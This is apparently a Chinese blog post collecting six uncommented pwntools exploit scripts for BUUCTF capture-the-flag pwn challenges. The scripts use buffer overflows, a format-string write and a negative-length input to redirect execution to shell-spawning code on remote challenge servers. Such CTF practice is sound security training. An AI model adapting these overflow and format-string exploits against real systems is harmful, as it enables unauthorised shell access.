buuctf pwn 部分exp(无解析,持续更新)_0rangecat的博客-爱代码爱编程
wustctf2020_getshell2 exp
from pwn import *
p = remote("node4.buuoj.cn", 27238)
call_system=0x8048529
sh_addr=0x08048670
payload=b'a'*28+p32(0x8048529)+p32(sh_addr)
p.sendline(payload)
p.interactive()
wustctf2020_getshell exp
from pwn import *
p = remote("node4.buuoj.cn", 27723)
payload=b'a'*28+p32(0x0804851B)
p.sendline(payload)
p.interactive()
level0 exp
from pwn import *
p = remote("node4.buuoj.cn", 28051)
payload=b'a'*128+b'b'*8+p64(0x00400596)
p.sendline(payload)
p.interactive()
[第五空间2019 决赛]PWN5
from pwn import *
p = remote("node4.buuoj.cn", 28342)
payload=fmtstr_payload(10,{0x804c044:1111})
p.sendlineafter('your name:',payload)
p.sendlineafter('your passwd:',str(1111))
p.interactive()
bjdctf_2020_babystack exp
from pwn import *
p = remote("node4.buuoj.cn", 28783)
p.sendline(str(-1))
payload=b'a'*24+p64(0x4006E6)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1exp
from pwn import *
p = remote("node4.buuoj.cn", 29026)
payload=b'I'*20+b'A'*4+p32(0x08048F0D)
p.sendline(payload)
p.interactive()